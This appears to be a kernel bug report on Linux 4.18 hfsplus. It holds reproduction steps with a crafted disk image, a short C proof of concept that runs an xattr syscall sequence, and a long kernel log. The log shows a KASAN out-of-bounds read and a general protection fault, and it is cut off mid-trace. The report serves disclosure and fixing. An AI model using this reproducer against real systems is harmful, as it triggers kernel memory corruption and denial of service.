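Created attachment 276889 [details]
The (compressed) crafted image which causes crash

- Reproduce (4.18)

# mkdir mnt
# mount -t hfsplus 3.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)

#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>

/*
 * Run the xattr sequence that triggers the hfsplus B-tree warning/KASAN
 * report on the crafted image.  The kernel log is the signal here, not the
 * syscall return values, so a failing step is only reported, never fatal.
 *
 * mpoint: mount point of the crafted hfsplus image; the path
 *         mpoint/foo/bar/xattr must exist on that image.
 */
static void activity(const char *mpoint)
{
    char *xattr = NULL;
    char buf2[113];

    memset(buf2, 0, sizeof(buf2));

    /* asprintf() leaves xattr undefined on failure; do not use it then. */
    if (asprintf(&xattr, "%s/foo/bar/xattr", mpoint) < 0)
        error(EXIT_FAILURE, errno, "asprintf");

    /* Same call order as originally reported; results are logged only. */
    if (listxattr(xattr, buf2, sizeof(buf2)) < 0)
        perror("listxattr");
    if (removexattr(xattr, "user.mime_type") < 0)
        perror("removexattr");
    if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE) < 0)
        perror("setxattr(XATTR_CREATE)");
    if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE) < 0)
        perror("setxattr(XATTR_REPLACE)");

    free(xattr);
}

/* argv[1] is the mount point of the crafted image. */
int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
        return EXIT_FAILURE;
    }
    activity(argv[1]);
    return 0;
}

- Kernel message

[ 278.718053] hfsplus: new node 0 already hashed?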
[ 278.719227] WARNING: CPU: 1 PID: 1410 at fs/hfsplus/bnode.c:584 hfsplus_bnode_create+0x1f3/0x200 [ 278.719233] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 278.719627] CPU: 1 PID: 1410 Comm: a.out Not tainted 4.18.0-rc1+ #6 [ 278.719630] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 278.719641] RIP: 0010:hfsplus_bnode_create+0x1f3/0x200 [ 278.719643] Code: 4c 89 ff e8 ef f4 ff ff 48 83 c4 08 48 c7 c0 fb ff ff ff 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c7 c7 a0 38 96 ae e8 b1 ba bb ff <0f> 0b 4c 89 e0 eb c0 66 0f 1f 44 00 00 66 66 66 66 90 55 48 89 e5 [ 278.719698] RSP: 0018:ffff8801e8db7308 EFLAGS: 00010286 [ 278.719708] RAX: 0000000000000023 RBX: ffff8801e07a006c RCX: 0000000000000000 [ 278.719710] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d1b6e57 [ 278.719713] RBP: ffff8801e8db7338 R08: ffffed003ede4f21 R09: ffffed003ede4f21 [ 278.719716] R10: 0000000000000001 R11: ffffed003ede4f20 R12: ffff8801e082db80 [ 278.719718] R13: 0000000000000000 R14: ffff8801e07a0000 R15: ffff8801e07a0000 [ 278.719722] FS: 00007f5a92cc6700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 278.719725] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 278.719728] CR2: 00007f5a9272e170 CR3: 00000001e5612000 CR4: 00000000000006e0 [ 278.719739] Call Trace: [ 278.719753] hfsplus_bmap_alloc+0x671/0x690 [ 278.719760] ? hfsplus_btree_write+0x1d0/0x1d0 [ 278.719800] ? remove_stable_node+0x78/0xa0 [ 278.719809] ? hfsplus_strcmp+0x97/0xe0 [ 278.719816] ? 
memcpy+0x45/0x50 [ 278.719821] ? hfsplus_bnode_read+0xb1/0x140 [ 278.719827] hfs_bnode_split+0xb2/0x6b0 [ 278.719830] ? memcpy+0x45/0x50 [ 278.719835] ? hfsplus_bnode_read+0xb1/0x140 [ 278.719840] ? hfs_bnode_need_zeroout+0x80/0x80 [ 278.719845] ? hfsplus_bnode_read_u16+0x6e/0xa0 [ 278.719849] ? hfsplus_bnode_read+0x140/0x140 [ 278.719855] hfsplus_brec_insert+0x1d6/0x6c0 [ 278.719861] ? hfsplus_brec_keylen+0x130/0x130 [ 278.719866] ? __kmalloc+0x11f/0x240 [ 278.719872] hfsplus_create_attr+0x263/0x2b0 [ 278.719877] ? hfsplus_attr_exists+0x140/0x140 [ 278.719913] ? strncmp+0x3d/0xc0 [ 278.719919] __hfsplus_setxattr+0x2d5/0x1160 [ 278.719950] ? unwind_get_return_address+0x36/0x50 [ 278.719956] ? kasan_check_write+0x14/0x20 [ 278.719971] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 278.719978] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 278.719982] ? save_stack+0x46/0xd0 [ 278.719986] ? kasan_kmalloc+0xad/0xe0 [ 278.719990] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.719994] ? hfsplus_setxattr+0x4c/0xb0 [ 278.719998] ? hfsplus_user_setxattr+0x27/0x30 [ 278.720011] ? __vfs_setxattr+0x7c/0xa0 [ 278.720015] ? __vfs_setxattr_noperm+0x8d/0x200 [ 278.720019] ? vfs_setxattr+0xb3/0xc0 [ 278.720022] ? setxattr+0x1b3/0x260 [ 278.720026] ? path_setxattr+0x134/0x170 [ 278.720029] ? __x64_sys_setxattr+0x6d/0x80 [ 278.720042] ? do_syscall_64+0x78/0x170 [ 278.720047] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.720052] ? save_stack+0xb5/0xd0 [ 278.720055] ? save_stack+0x46/0xd0 [ 278.720058] ? kasan_kmalloc+0xad/0xe0 [ 278.720062] ? __kmalloc_node+0x11e/0x2e0 [ 278.720078] ? kvmalloc_node+0x31/0x80 [ 278.720082] ? setxattr+0x114/0x260 [ 278.720086] ? path_setxattr+0x134/0x170 [ 278.720089] ? __x64_sys_setxattr+0x6d/0x80 [ 278.720093] ? do_syscall_64+0x78/0x170 [ 278.720098] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.720102] ? save_stack+0xb5/0xd0 [ 278.720105] ? save_stack+0x46/0xd0 [ 278.720109] ? __kasan_slab_free+0x13c/0x1a0 [ 278.720112] ? 
kasan_slab_free+0xe/0x10 [ 278.720116] ? kmem_cache_free+0x89/0x1e0 [ 278.720125] ? putname+0x80/0x90 [ 278.720129] ? filename_lookup+0x191/0x280 [ 278.720133] ? kasan_unpoison_shadow+0x36/0x50 [ 278.720137] ? kasan_kmalloc+0xad/0xe0 [ 278.720142] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.720148] hfsplus_setxattr+0x8a/0xb0 [ 278.720152] hfsplus_user_setxattr+0x27/0x30 [ 278.720156] __vfs_setxattr+0x7c/0xa0 [ 278.720161] __vfs_setxattr_noperm+0x8d/0x200 [ 278.720165] vfs_setxattr+0xb3/0xc0 [ 278.720170] setxattr+0x1b3/0x260 [ 278.720174] ? vfs_setxattr+0xc0/0xc0 [ 278.720178] ? filename_lookup+0x191/0x280 [ 278.720182] ? filename_parentat+0x2b0/0x2b0 [ 278.720186] ? kasan_kmalloc+0xad/0xe0 [ 278.720191] ? kasan_check_write+0x14/0x20 [ 278.720213] ? strncpy_from_user+0xa8/0x1c0 [ 278.720226] ? __mnt_is_readonly.part.13+0x23/0x30 [ 278.720231] ? __mnt_want_write+0x9d/0xb0 [ 278.720236] path_setxattr+0x134/0x170 [ 278.720240] ? setxattr+0x260/0x260 [ 278.720249] ? vm_brk+0x20/0x20 [ 278.720255] __x64_sys_setxattr+0x6d/0x80 [ 278.720260] do_syscall_64+0x78/0x170 [ 278.720265] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.720285] RIP: 0033:0x7f5a927e71fa [ 278.720287] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 278.720343] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 278.720347] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa [ 278.720350] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080 [ 278.720353] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000 [ 278.720355] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0 [ 278.720361] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000 [ 278.720366] ---[ end trace 7f5a46c7478f1295 ]--- [ 278.720395] hfsplus: new node 0 already hashed? 
[ 278.721376] WARNING: CPU: 1 PID: 1410 at fs/hfsplus/bnode.c:584 hfsplus_bnode_create+0x1f3/0x200 [ 278.721377] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 278.721441] CPU: 1 PID: 1410 Comm: a.out Tainted: G W 4.18.0-rc1+ #6 [ 278.721444] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 278.721449] RIP: 0010:hfsplus_bnode_create+0x1f3/0x200 [ 278.721450] Code: 4c 89 ff e8 ef f4 ff ff 48 83 c4 08 48 c7 c0 fb ff ff ff 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c7 c7 a0 38 96 ae e8 b1 ba bb ff <0f> 0b 4c 89 e0 eb c0 66 0f 1f 44 00 00 66 66 66 66 90 55 48 89 e5 [ 278.721505] RSP: 0018:ffff8801e8db7318 EFLAGS: 00010282 [ 278.721509] RAX: 0000000000000023 RBX: ffff8801e07a006c RCX: 0000000000000000 [ 278.721511] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d1b6e59 [ 278.721514] RBP: ffff8801e8db7348 R08: ffffed003ede3ebb R09: ffffed003ede3ebb [ 278.721517] R10: 0000000000000001 R11: ffffed003ede3eba R12: ffff8801e082db80 [ 278.721519] R13: 0000000000000000 R14: ffff8801e07a0000 R15: ffff8801e07a0000 [ 278.721523] FS: 00007f5a92cc6700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 278.721525] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 278.721528] CR2: 00007f5a9272e170 CR3: 00000001e5612000 CR4: 00000000000006e0 [ 278.721532] Call Trace: [ 278.721540] hfsplus_bmap_alloc+0x671/0x690 [ 278.721545] ? hfsplus_btree_write+0x1d0/0x1d0 [ 278.721550] ? hfsplus_bnode_put+0x190/0x190 [ 278.721554] ? memcpy+0x45/0x50 [ 278.721559] ? 
hfsplus_bnode_read+0xb1/0x140 [ 278.721565] hfs_btree_inc_height+0xd3/0x450 [ 278.721569] ? hfs_brec_update_parent+0xa6/0x560 [ 278.721574] ? hfs_bnode_split+0x6b0/0x6b0 [ 278.721588] ? mark_page_accessed+0x133/0x200 [ 278.721594] ? hfsplus_bnode_put+0xb8/0x190 [ 278.721599] hfsplus_brec_insert+0x5a5/0x6c0 [ 278.721605] ? hfsplus_brec_keylen+0x130/0x130 [ 278.721609] ? __kmalloc+0x11f/0x240 [ 278.721615] hfsplus_create_attr+0x263/0x2b0 [ 278.721621] ? hfsplus_attr_exists+0x140/0x140 [ 278.721626] ? strncmp+0x3d/0xc0 [ 278.721632] __hfsplus_setxattr+0x2d5/0x1160 [ 278.721637] ? unwind_get_return_address+0x36/0x50 [ 278.721642] ? kasan_check_write+0x14/0x20 [ 278.721647] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 278.721653] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 278.721657] ? save_stack+0x46/0xd0 [ 278.721661] ? kasan_kmalloc+0xad/0xe0 [ 278.721665] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.721669] ? hfsplus_setxattr+0x4c/0xb0 [ 278.721673] ? hfsplus_user_setxattr+0x27/0x30 [ 278.721677] ? __vfs_setxattr+0x7c/0xa0 [ 278.721680] ? __vfs_setxattr_noperm+0x8d/0x200 [ 278.721684] ? vfs_setxattr+0xb3/0xc0 [ 278.721687] ? setxattr+0x1b3/0x260 [ 278.721691] ? path_setxattr+0x134/0x170 [ 278.721694] ? __x64_sys_setxattr+0x6d/0x80 [ 278.721698] ? do_syscall_64+0x78/0x170 [ 278.721703] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.721708] ? save_stack+0xb5/0xd0 [ 278.721711] ? save_stack+0x46/0xd0 [ 278.721714] ? kasan_kmalloc+0xad/0xe0 [ 278.721718] ? __kmalloc_node+0x11e/0x2e0 [ 278.721723] ? kvmalloc_node+0x31/0x80 [ 278.721726] ? setxattr+0x114/0x260 [ 278.721730] ? path_setxattr+0x134/0x170 [ 278.721733] ? __x64_sys_setxattr+0x6d/0x80 [ 278.721737] ? do_syscall_64+0x78/0x170 [ 278.721746] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.721751] ? save_stack+0xb5/0xd0 [ 278.721776] ? save_stack+0x46/0xd0 [ 278.721780] ? __kasan_slab_free+0x13c/0x1a0 [ 278.721783] ? kasan_slab_free+0xe/0x10 [ 278.721787] ? kmem_cache_free+0x89/0x1e0 [ 278.721790] ? 
putname+0x80/0x90 [ 278.721794] ? filename_lookup+0x191/0x280 [ 278.721798] ? kasan_unpoison_shadow+0x36/0x50 [ 278.721802] ? kasan_kmalloc+0xad/0xe0 [ 278.721807] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.721812] hfsplus_setxattr+0x8a/0xb0 [ 278.721817] hfsplus_user_setxattr+0x27/0x30 [ 278.721821] __vfs_setxattr+0x7c/0xa0 [ 278.721825] __vfs_setxattr_noperm+0x8d/0x200 [ 278.721830] vfs_setxattr+0xb3/0xc0 [ 278.721834] setxattr+0x1b3/0x260 [ 278.721838] ? vfs_setxattr+0xc0/0xc0 [ 278.721842] ? filename_lookup+0x191/0x280 [ 278.721846] ? filename_parentat+0x2b0/0x2b0 [ 278.721850] ? kasan_kmalloc+0xad/0xe0 [ 278.721855] ? kasan_check_write+0x14/0x20 [ 278.721860] ? strncpy_from_user+0xa8/0x1c0 [ 278.721865] ? __mnt_is_readonly.part.13+0x23/0x30 [ 278.721870] ? __mnt_want_write+0x9d/0xb0 [ 278.721874] path_setxattr+0x134/0x170 [ 278.721878] ? setxattr+0x260/0x260 [ 278.721882] ? vm_brk+0x20/0x20 [ 278.721887] __x64_sys_setxattr+0x6d/0x80 [ 278.721897] do_syscall_64+0x78/0x170 [ 278.721903] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.721906] RIP: 0033:0x7f5a927e71fa [ 278.721907] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 278.721962] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 278.721966] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa [ 278.721969] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080 [ 278.721972] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000 [ 278.721974] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0 [ 278.721976] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000 [ 278.721980] ---[ end trace 7f5a46c7478f1296 ]--- [ 278.725358] ================================================================== [ 278.726920] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_copy+0x2a8/0x360 [ 
278.728353] Read of size 8 at addr ffff8801e082db60 by task a.out/1410 [ 278.730053] CPU: 1 PID: 1410 Comm: a.out Tainted: G W 4.18.0-rc1+ #6 [ 278.730056] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 278.730058] Call Trace: [ 278.730066] dump_stack+0x7b/0xb5 [ 278.730071] print_address_description+0x70/0x290 [ 278.730075] kasan_report+0x291/0x390 [ 278.730080] ? hfsplus_bnode_copy+0x2a8/0x360 [ 278.730090] __asan_load8+0x54/0x90 [ 278.730094] hfsplus_bnode_copy+0x2a8/0x360 [ 278.730099] ? hfsplus_bnode_write+0xc2/0x170 [ 278.730104] hfs_btree_inc_height+0x2b5/0x450 [ 278.730110] ? hfs_bnode_split+0x6b0/0x6b0 [ 278.730118] ? mark_page_accessed+0x133/0x200 [ 278.730124] ? hfsplus_bnode_put+0xb8/0x190 [ 278.730129] hfsplus_brec_insert+0x5a5/0x6c0 [ 278.730135] ? hfsplus_brec_keylen+0x130/0x130 [ 278.730139] ? __kmalloc+0x11f/0x240 [ 278.730146] hfsplus_create_attr+0x263/0x2b0 [ 278.730155] ? hfsplus_attr_exists+0x140/0x140 [ 278.730160] ? strncmp+0x3d/0xc0 [ 278.730165] __hfsplus_setxattr+0x2d5/0x1160 [ 278.730171] ? unwind_get_return_address+0x36/0x50 [ 278.730177] ? kasan_check_write+0x14/0x20 [ 278.730185] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 278.730191] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 278.730195] ? save_stack+0x46/0xd0 [ 278.730198] ? kasan_kmalloc+0xad/0xe0 [ 278.730202] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.730207] ? hfsplus_setxattr+0x4c/0xb0 [ 278.730211] ? hfsplus_user_setxattr+0x27/0x30 [ 278.730217] ? __vfs_setxattr+0x7c/0xa0 [ 278.730227] ? __vfs_setxattr_noperm+0x8d/0x200 [ 278.730235] ? vfs_setxattr+0xb3/0xc0 [ 278.730239] ? setxattr+0x1b3/0x260 [ 278.730242] ? path_setxattr+0x134/0x170 [ 278.730246] ? __x64_sys_setxattr+0x6d/0x80 [ 278.730250] ? do_syscall_64+0x78/0x170 [ 278.730255] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.730260] ? save_stack+0xb5/0xd0 [ 278.730264] ? save_stack+0x46/0xd0 [ 278.730267] ? kasan_kmalloc+0xad/0xe0 [ 278.730271] ? 
__kmalloc_node+0x11e/0x2e0 [ 278.730275] ? kvmalloc_node+0x31/0x80 [ 278.730280] ? setxattr+0x114/0x260 [ 278.730285] ? path_setxattr+0x134/0x170 [ 278.730290] ? __x64_sys_setxattr+0x6d/0x80 [ 278.730298] ? do_syscall_64+0x78/0x170 [ 278.730302] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.730306] ? save_stack+0xb5/0xd0 [ 278.730309] ? save_stack+0x46/0xd0 [ 278.730312] ? __kasan_slab_free+0x13c/0x1a0 [ 278.730316] ? kasan_slab_free+0xe/0x10 [ 278.730320] ? kmem_cache_free+0x89/0x1e0 [ 278.730324] ? putname+0x80/0x90 [ 278.730329] ? filename_lookup+0x191/0x280 [ 278.730334] ? kasan_unpoison_shadow+0x36/0x50 [ 278.730341] ? kasan_kmalloc+0xad/0xe0 [ 278.730346] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.730352] hfsplus_setxattr+0x8a/0xb0 [ 278.730356] hfsplus_user_setxattr+0x27/0x30 [ 278.730361] __vfs_setxattr+0x7c/0xa0 [ 278.730369] __vfs_setxattr_noperm+0x8d/0x200 [ 278.730374] vfs_setxattr+0xb3/0xc0 [ 278.730378] setxattr+0x1b3/0x260 [ 278.730382] ? vfs_setxattr+0xc0/0xc0 [ 278.730387] ? filename_lookup+0x191/0x280 [ 278.730391] ? filename_parentat+0x2b0/0x2b0 [ 278.730398] ? kasan_kmalloc+0xad/0xe0 [ 278.730403] ? kasan_check_write+0x14/0x20 [ 278.730408] ? strncpy_from_user+0xa8/0x1c0 [ 278.730413] ? __mnt_is_readonly.part.13+0x23/0x30 [ 278.730419] ? __mnt_want_write+0x9d/0xb0 [ 278.730426] path_setxattr+0x134/0x170 [ 278.730430] ? setxattr+0x260/0x260 [ 278.730434] ? 
vm_brk+0x20/0x20 [ 278.730438] __x64_sys_setxattr+0x6d/0x80 [ 278.730443] do_syscall_64+0x78/0x170 [ 278.730448] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.730453] RIP: 0033:0x7f5a927e71fa [ 278.730455] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 278.730525] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 278.730529] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa [ 278.730532] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080 [ 278.730534] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000 [ 278.730538] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0 [ 278.730542] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000 [ 278.730894] Allocated by task 1410: [ 278.731642] save_stack+0x46/0xd0 [ 278.731647] kasan_kmalloc+0xad/0xe0 [ 278.731651] __kmalloc+0x11f/0x240 [ 278.731657] __hfs_bnode_create+0xc6/0x3f0 [ 278.731665] hfsplus_bnode_find+0x1f0/0x500 [ 278.731669] hfsplus_brec_find+0x1c1/0x2e0 [ 278.731673] hfsplus_find_attr+0xb2/0xd0 [ 278.731676] hfsplus_listxattr+0x273/0x6e0 [ 278.731679] vfs_listxattr+0x9d/0xc0 [ 278.731684] listxattr+0x58/0xd0 [ 278.731689] path_listxattr+0xb9/0x120 [ 278.731692] __x64_sys_listxattr+0x48/0x50 [ 278.731700] do_syscall_64+0x78/0x170 [ 278.731705] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.732051] Freed by task 0: [ 278.732676] (stack is not available) [ 278.733779] The buggy address belongs to the object at ffff8801e082db00 which belongs to the cache kmalloc-96 of size 96 [ 278.736283] The buggy address is located 0 bytes to the right of 96-byte region [ffff8801e082db00, ffff8801e082db60) [ 278.738721] The buggy address belongs to the page: [ 278.739721] page:ffffea0007820b40 count:1 mapcount:0 mapping:ffff8801f6803500 index:0x0 [ 278.741355] flags: 
0x2ffff0000000100(slab) [ 278.742229] raw: 02ffff0000000100 dead000000000100 dead000000000200 ffff8801f6803500 [ 278.743776] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000 [ 278.745321] page dumped because: kasan: bad access detected [ 278.746786] Memory state around the buggy address: [ 278.747765] ffff8801e082da00: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc [ 278.749249] ffff8801e082da80: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc [ 278.750731] >ffff8801e082db00: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc [ 278.752197] ^ [ 278.753497] ffff8801e082db80: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc [ 278.754982] ffff8801e082dc00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 278.756448] ================================================================== [ 278.799025] Disabling lock debugging due to kernel taint [ 278.800160] general protection fault: 0000 [#1] SMP KASAN PTI [ 278.801417] CPU: 0 PID: 1410 Comm: a.out Tainted: G B W 4.18.0-rc1+ #6 [ 278.803004] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 278.804953] RIP: 0010:__memcpy+0x12/0x20 [ 278.805773] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4 [ 278.809613] RSP: 0018:ffff8801e8db7430 EFLAGS: 00010246 [ 278.810705] RAX: a805570000016000 RBX: 0000000000001000 RCX: 0000000000000200 [ 278.812157] RDX: 0000000000000000 RSI: 700556c000016000 RDI: a805570000016000 [ 278.813606] RBP: ffff8801e8db7450 R08: ffffed003e09c499 R09: ffffed003e09c499 [ 278.815062] R10: 0000000000000001 R11: ffffed003e09c498 R12: a805570000016000 [ 278.816505] R13: 700556c000016000 R14: ffff8801e082db60 R15: 0000000000001000 [ 278.817960] FS: 00007f5a92cc6700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 278.819599] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 278.820770] 
CR2: 00007f828de0901a CR3: 00000001e5612000 CR4: 00000000000006f0 [ 278.822230] Call Trace: [ 278.822757] ? memcpy+0x45/0x50 [ 278.823422] hfsplus_bnode_copy+0x333/0x360 [ 278.824287] ? hfsplus_bnode_write+0xc2/0x170 [ 278.825187] hfs_btree_inc_height+0x2b5/0x450 [ 278.826102] ? hfs_bnode_split+0x6b0/0x6b0 [ 278.826954] ? mark_page_accessed+0x133/0x200 [ 278.827856] ? hfsplus_bnode_put+0xb8/0x190 [ 278.828722] hfsplus_brec_insert+0x5a5/0x6c0 [ 278.829607] ? hfsplus_brec_keylen+0x130/0x130 [ 278.830539] ? __kmalloc+0x11f/0x240 [ 278.831283] hfsplus_create_attr+0x263/0x2b0 [ 278.832167] ? hfsplus_attr_exists+0x140/0x140 [ 278.833085] ? strncmp+0x3d/0xc0 [ 278.833771] __hfsplus_setxattr+0x2d5/0x1160 [ 278.834664] ? unwind_get_return_address+0x36/0x50 [ 278.835654] ? kasan_check_write+0x14/0x20 [ 278.836508] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 278.837443] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 278.838647] ? save_stack+0x46/0xd0 [ 278.839372] ? kasan_kmalloc+0xad/0xe0 [ 278.840149] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.841115] ? hfsplus_setxattr+0x4c/0xb0 [ 278.841956] ? hfsplus_user_setxattr+0x27/0x30 [ 278.842869] ? __vfs_setxattr+0x7c/0xa0 [ 278.843658] ? __vfs_setxattr_noperm+0x8d/0x200 [ 278.844589] ? vfs_setxattr+0xb3/0xc0 [ 278.845347] ? setxattr+0x1b3/0x260 [ 278.846083] ? path_setxattr+0x134/0x170 [ 278.846895] ? __x64_sys_setxattr+0x6d/0x80 [ 278.847760] ? do_syscall_64+0x78/0x170 [ 278.848557] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.849629] ? save_stack+0xb5/0xd0 [ 278.850364] ? save_stack+0x46/0xd0 [ 278.851088] ? kasan_kmalloc+0xad/0xe0 [ 278.851862] ? __kmalloc_node+0x11e/0x2e0 [ 278.852690] ? kvmalloc_node+0x31/0x80 [ 278.853466] ? setxattr+0x114/0x260 [ 278.854206] ? path_setxattr+0x134/0x170 [ 278.855034] ? __x64_sys_setxattr+0x6d/0x80 [ 278.855898] ? do_syscall_64+0x78/0x170 [ 278.856694] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.857771] ? save_stack+0xb5/0xd0 [ 278.858501] ? save_stack+0x46/0xd0 [ 278.859226] ? 
